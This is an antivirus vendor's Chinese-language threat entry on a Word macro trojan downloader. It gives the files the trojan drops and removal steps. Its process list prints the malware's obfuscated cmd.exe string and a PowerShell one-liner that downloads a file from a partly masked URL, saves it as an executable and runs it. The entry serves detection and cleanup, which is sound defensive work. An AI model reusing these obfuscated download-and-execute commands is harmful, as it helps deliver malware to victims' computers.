分析者: John Rainier Navato   

 :

Trojan-Downloader.MSWord.Agent.cfm (KASPERSKY)

 平台:

Windows

 总体风险等级:
 潜在破坏:
 潜在分布:
 感染次数:
 信息暴露:

  • 恶意软件类型:
    Trojan

  • 有破坏性?:
    没有

  • 加密?:
     

  • In the Wild:
    是的

  概要

感染途徑: 从互联网上下载, 下载了其他恶意软件

它以文件的形式出现在系统中,可能是其他恶意软件投放的,或者是用户在访问恶意网站时无意中下载的。

  技术详细信息

文件大小: 137,600 bytes
报告日期: DOC
初始樣本接收日期: 2018年12月28日
Payload: 连接到 URL/Ip, 植入文件

新病毒详细信息

它以文件的形式出现在系统中,可能是其他恶意软件投放的,或者是用户在访问恶意网站时无意中下载的。

安装

它植入下列文件:

  • %User Temp%\{Random Characters}.ps1
  • %User Temp%\{Random Characters}.psm1
  • %Application Data%\Microsoft\Office\Recent\{Malware File Name}.doc.LNK

(注意: %User Temp% 是当前用户的 Temp 文件夹。通常位于 C:\Documents and Settings\{user name}\Local Settings\Temp (Windows 2000(32-bit)、XP 和 Server 2003(32-bit))、C:\Users\{user name}\AppData\Local\Temp (Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit) 和 10(64-bit)。. %Application Data% 是当前用户的 Application Data 文件夹,通常位于 C:\Windows\Profiles\{user name}\Application Data (Windows 98 和 ME)、C:\WINNT\Profiles\{user name}\Application Data (Windows NT)、C:\Documents and Settings\{user name}\Local Settings\Application Data (Windows 2000(32-bit)、XP 和 Server 2003(32-bit)) 和 C:\Users\{user name}\AppData\Roaming (Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit) 和 10(64-bit))。)

它添加下列进程:

  • cmd /c %PRogrAmDaTa:~0,1%%ProgRAmData:~9,2% /v: /c "set CBku=5pr+Ls;t7Gui\ng,fz2S=@C.PdWbe:RcEw0)/B$1TUx l(NMyvFmj8Z3AI6~a{hoD9-}'4%kO& FOR %z In ( 1 63 33 70 24 41 37 4 57 22 29 59 0 15 39 70 2 70 19 32 19 19 57 72 46 46 56 47 32 29 59 66 69 15 39 70 62 70 40 32 47 24 29 59 66 55 15 39 70 44 44 43 38 17 18 18 8 20 68 13 39 69 69 68 6 38 62 69 34 58 20 13 28 33 66 63 27 52 28 31 7 43 46 28 7 23 26 28 27 22 44 11 28 13 7 6 38 2 18 53 34 20 68 62 7 7 1 29 36 36 16 2 28 28 23 25 11 28 14 63 60 44 28 42 23 31 63 51 36 55 18 53 65 16 71 52 5 25 16 48 10 55 23 27 11 13 68 23 19 1 44 11 7 45 68 21 68 35 6 38 52 18 53 65 20 68 11 69 69 65 68 6 38 4 8 69 18 43 20 43 68 0 69 8 68 6 38 17 55 18 18 20 68 63 55 55 34 68 6 38 52 65 55 34 20 38 28 13 49 29 1 10 27 44 11 31 3 68 12 68 3 38 4 8 69 18 3 68 23 28 42 28 68 6 16 63 2 28 60 31 62 45 38 17 65 18 0 43 11 13 43 38 2 18 53 34 35 61 7 2 48 61 38 62 69 34 58 23 64 63 33 13 44 63 60 25 50 11 44 28 45 38 17 65 18 0 15 43 38 52 65 55 34 35 6 38 33 53 8 18 20 68 56 18 53 55 68 6 57 16 43 45 45 9 28 7 66 57 7 28 51 43 38 52 65 55 34 35 23 44 28 13 14 7 62 43 66 14 28 43 53 34 34 34 34 35 43 61 57 13 49 63 71 28 66 57 7 28 51 43 38 52 65 55 34 6 38 54 65 65 69 20 68 22 0 55 8 68 6 27 2 28 60 71 6 67 67 31 60 7 31 62 61 67 67 38 30 58 8 58 20 68 33 39 0 18 68 6 81) DO SEt 2fvq=!2fvq!!CBku:~ %z, 1!&&if %z == 81 ecHo !2fvq:~ -408!| FOR /F "delims=TFSH tokens=1" %J IN ('ftype^^^|findstr mdFi')DO %J "
  • CmD /v: /c "set CBku=5pr+Ls;t7Gui\ng,fz2S=@C.PdWbe:RcEw0)/B$1TUx l(NMyvFmj8Z3AI6~a{hoD9-}'4%kO& FOR %z In ( 1 63 33 70 24 41 37 4 57 22 29 59 0 15 39 70 2 70 19 32 19 19 57 72 46 46 56 47 32 29 59 66 69 15 39 70 62 70 40 32 47 24 29 59 66 55 15 39 70 44 44 43 38 17 18 18 8 20 68 13 39 69 69 68 6 38 62 69 34 58 20 13 28 33 66 63 27 52 28 31 7 43 46 28 7 23 26 28 27 22 44 11 28 13 7 6 38 2 18 53 34 20 68 62 7 7 1 29 36 36 16 2 28 28 23 25 11 28 14 63 60 44 28 42 23 31 63 51 36 55 18 53 65 16 71 52 5 25 16 48 10 55 23 27 11 13 68 23 19 1 44 11 7 45 68 21 68 35 6 38 52 18 53 65 20 68 11 69 69 65 68 6 38 4 8 69 18 43 20 43 68 0 69 8 68 6 38 17 55 18 18 20 68 63 55 55 34 68 6 38 52 65 55 34 20 38 28 13 49 29 1 10 27 44 11 31 3 68 12 68 3 38 4 8 69 18 3 68 23 28 42 28 68 6 16 63 2 28 60 31 62 45 38 17 65 18 0 43 11 13 43 38 2 18 53 34 35 61 7 2 48 61 38 62 69 34 58 23 64 63 33 13 44 63 60 25 50 11 44 28 45 38 17 65 18 0 15 43 38 52 65 55 34 35 6 38 33 53 8 18 20 68 56 18 53 55 68 6 57 16 43 45 45 9 28 7 66 57 7 28 51 43 38 52 65 55 34 35 23 44 28 13 14 7 62 43 66 14 28 43 53 34 34 34 34 35 43 61 57 13 49 63 71 28 66 57 7 28 51 43 38 52 65 55 34 6 38 54 65 65 69 20 68 22 0 55 8 68 6 27 2 28 60 71 6 67 67 31 60 7 31 62 61 67 67 38 30 58 8 58 20 68 33 39 0 18 68 6 81) DO SEt 2fvq=!2fvq!!CBku:~ %z, 1!&&if %z == 81 ecHo !2fvq:~ -408!| FOR /F "delims=TFSH tokens=1" %J IN ('ftype^^^|findstr mdFi')DO %J "
  • %System%\cmd.exe /S /D /c" ecHo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $z227='n144';$h406=new-object Net.WebClient;$r280='http://free.{BLOCKED}lex.com/3289fkjsdfyu3.bin'.Split('@');$j289='i449';$L742 = '547';$z322='o330';$j930=$env:public+'\'+$L742+'.exe';foreach($z925 in $r280){try{$h406.DownloadFile($z925, $j930);$w872='A283';If ((Get-Item $j930).length -ge 80000) {Invoke-Item $j930;$Z994='C537';break;}}catch{}}$R676='w152';"
  • %System%\cmd.exe /S /D /c" FOR /F "delims=TFSH tokens=1" %J IN ('ftype^|findstr mdFi') DO %J "
  • %System%\cmd.exe /c ftype|findstr mdFi
  • %System%\cmd.exe /S /D /c" ftype"
  • %System%\findstr.exe findstr mdFi
  • powershell $z227='n144';$h406=new-object Net.WebClient;$r280='http://free.{BLOCKED}lex.com/3289fkjsdfyu3.bin'.Split('@');$j289='i449';$L742 = '547';$z322='o330';$j930=$env:public+'\'+$L742+'.exe';foreach($z925 in $r280){try{$h406.DownloadFile($z925, $j930);$w872='A283';If ((Get-Item $j930).length -ge 80000) {Invoke-Item $j930;$Z994='C537';break;}}catch{}}$R676='w152';

其他详细信息

它连接到以下可疑的网址:

  • http://free.{BLOCKED}lex.com/3289fkjsdfyu3.bin

  解决方案

最小扫描引擎: 9.800
First VSAPI Pattern File: 14.714.03
VSAPI 第一样式发布日期: 2018年12月27日
VSAPI OPR样式版本: 14.715.00
VSAPI OPR样式发布日期: 2018年12月28日

Step 2

对于Windows ME和XP用户,在扫描前,请确认已禁用系统还原功能,才可全面扫描计算机。

Step 3

注意:在此恶意软件/间谍软件/灰色软件执行期间,并非所有文件、文件夹和注册表键值和项都会安装到您的计算机上。这可能是由于不完整的安装或其他操作系统条件所致。如果您没有找到相同的文件/文件夹/注册表信息,请继续进行下一步操作。

Step 4

搜索和删除这些文件

[ 更多 ]
有些组件文件可能是隐藏的。请确认在"高级选项"中已选中搜索隐藏文件和文件夹复选框,使查找结果包括所有隐藏文件和文件夹。  
  • %User Temp%\{Random Characters}.ps1
  • %User Temp%\{Random Characters}.psm1
  • %Application Data%\Microsoft\Office\Recent\{Malware File Name}.doc.LNK
DATA_GENERIC_FILENAME_1
  • 查找范围下拉列表中,选择
  • 我的电脑然后回车确认。
  • 一旦找到,请选择文件,然后按下SHIFT+DELETE彻底删除文件。
  • 对剩余的文件重复第2到4步:
       
      • %User Temp%\{Random Characters}.ps1
      • %User Temp%\{Random Characters}.psm1
      • %Application Data%\Microsoft\Office\Recent\{Malware File Name}.doc.LNK
  • Step 5

    使用亚信安全产品扫描计算机,并删除检测到的Trojan.W97M.POWLOAD.AMQ文件 如果检测到的文件已被亚信安全产品清除、删除或隔离,则无需采取进一步措施。可以选择直接删除隔离的文件。请参阅知识库页面了解详细信息。